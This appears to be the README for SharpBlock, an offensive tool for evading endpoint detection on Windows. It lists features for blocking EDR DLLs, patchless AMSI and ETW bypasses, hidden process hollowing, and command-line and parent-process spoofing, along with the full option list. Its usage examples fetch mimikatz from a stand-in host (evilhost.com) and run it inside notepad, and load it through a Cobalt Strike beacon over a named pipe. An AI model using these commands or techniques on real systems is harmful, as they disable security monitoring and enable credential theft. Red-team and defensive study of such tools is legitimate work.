A method of bypassing EDR's active projection DLL's by preventing entry point execution.
- Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
- Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
- Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
- Implanted process is hidden to help evade scanners looking for hollowed processes.
- Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
- Patchless ETW bypass.
- Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space
SharpBlock by @_EthicalChaos_ DLL Blocking app for child processes x64 -e, --exe=VALUE Program to execute (default cmd.exe) -a, --args=VALUE Arguments for program (default null) -n, --name=VALUE Name of DLL to block -c, --copyright=VALUE Copyright string to block -p, --product=VALUE Product string to block -d, --description=VALUE Description string to block -s, --spawn=VALUE Host process to spawn for swapping with the target exe -ppid=VALUE Parent process ID for spawned child (PPID Spoofing) -w, --show Show the lauched process window instead of the default hide --disable-bypass-amsi Disable AMSI bypassAmsi --disable-bypass-cmdline Disable command line bypass --disable-bypass-etw Disable ETW bypass --disable-header-patch Disable process hollow detection bypass -h, --help Display this help
Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi
Note, for the
upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager
Accompanying Blog Posts: